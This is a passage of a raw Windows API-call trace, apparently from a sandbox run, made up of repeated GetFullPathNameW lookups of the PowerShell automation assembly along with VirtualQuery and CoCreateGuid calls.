lpFilePart=0x0) returned 0x74 [0108.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.910] VirtualQuery (in: lpAddress=0x10bc30, lpBuffer=0x10caf0, dwLength=0x30 | out: lpBuffer=0x10caf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.915] VirtualQuery (in: lpAddress=0x10bc30, lpBuffer=0x10caf0, dwLength=0x30 | out: lpBuffer=0x10caf0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.916] VirtualQuery (in: lpAddress=0x10b320, lpBuffer=0x10c1e0, dwLength=0x30 | out: lpBuffer=0x10c1e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.916] VirtualQuery (in: lpAddress=0x10b3b0, lpBuffer=0x10c270, dwLength=0x30 | out: lpBuffer=0x10c270*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.917] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.918] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.920] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.920] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.921] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.921] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.921] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.922] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.922] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.922] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.924] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.924] VirtualQuery (in: lpAddress=0x10b760, lpBuffer=0x10c620, dwLength=0x30 | out: lpBuffer=0x10c620*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.924] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.926] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.927] VirtualQuery (in: lpAddress=0x10ba90, lpBuffer=0x10c950, dwLength=0x30 | out: lpBuffer=0x10c950*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.927] VirtualQuery (in: lpAddress=0x10bb20, lpBuffer=0x10c9e0, dwLength=0x30 | out: lpBuffer=0x10c9e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.928] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0x6452fb2c, Data2=0xbbca, Data3=0x4b29, Data4=([0]=0x80, [1]=0x4e, [2]=0x9c, [3]=0xeb, [4]=0xb, [5]=0x19, [6]=0xb3, [7]=0xb5))) returned 0x0 [0108.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.933] VirtualQuery (in: lpAddress=0x10b320, lpBuffer=0x10c1e0, dwLength=0x30 | out: lpBuffer=0x10c1e0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.934] VirtualQuery (in: lpAddress=0x10b3b0, lpBuffer=0x10c270, dwLength=0x30 | out: lpBuffer=0x10c270*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.935] VirtualQuery (in: lpAddress=0x10b5d0, lpBuffer=0x10c490, dwLength=0x30 | out: lpBuffer=0x10c490*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0108.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.936] CoCreateGuid (in: pguid=0x10d310 | out: pguid=0x10d310*(Data1=0xaf7ac667, Data2=0xd722, Data3=0x469d, Data4=([0]=0x85, [1]=0xc0, [2]=0x84, [3]=0xe8, [4]=0x98, [5]=0x9f, [6]=0x6b, [7]=0x5b))) returned 0x0 [0108.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10c7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0108.937] 